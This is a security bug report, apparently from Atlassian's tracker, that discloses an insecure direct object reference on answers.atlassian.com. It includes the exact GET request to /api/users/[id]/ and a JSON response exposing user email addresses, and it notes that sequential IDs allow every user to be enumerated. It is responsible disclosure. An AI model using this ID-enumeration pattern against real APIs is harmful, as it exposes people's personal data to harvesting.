Direct Object Reference - User Information Disclosure

XMLWordPrintable

    • Severity 3 - Minor

      NOTE: This bug report is for Confluence Server. Using Confluence Cloud? See the corresponding bug report.

      A direct object reference vulnerability exists on the answers.atlassian.com platform which allows for malicious users to obtain the email address of any given ID.

      Additionally since the ID's are incremental, it would be possible for an attacker to gain the email addresses of every single Atlassian Answers user.

      If the Atlassian Answers systems are linked with the main Atlassian identification system, it may be likely that every Atlassian users email address is exposed to any user.

      By making the following request where [id] is modified in the GET request path, any users email address is able to be obtained:

      GET /api/users/[id]/ HTTP/1.1
Host: answers.atlassian.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRFToken: 6f6f820e0235bec839d1c48a049e4d89
X-Requested-With: XMLHttpRequest
Referer: https://answers.atlassian.com/questions/299003/
Cookie: [redacted]
Connection: keep-alive

      the following response is obtained:

      HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 May 2014 10:56:41 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Vary: Authorization,Cookie
X-Frame-Options: SAMEORIGIN
Content-Length: 581
{
    "username": "[fullname]", 
    "website": "", 
    "about": "", 
    "links": {
        "badges": "/users/[id]/badges", 
        "self": "/users/[id]", 
        "questions": "/users/[id]/questions", 
        "answers": "/users/[id]/answers"
    }, 
    "tags": [], 
    "organisation": "Atlassian", 
    "answers": [no], 
    "id": [id], 
    "karma": [no], 
    "questions": 0, 
    "following": false, 
    "last_seen": "[date]", 
    "date_joined": "[date]", 
    "email": "*[email]*", 
    "badges": [no], 
    "location": ""
}

      I was able to confirm that this vulnerability affects approximately 170,000 Atlassian users, however did not retrieve the details of accounts in the masses.

              Assignee:
              Dennis Kromhout van der Meer (Inactive)
              Reporter:
              Shubham
              Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

                Created:
                Updated:
                Resolved: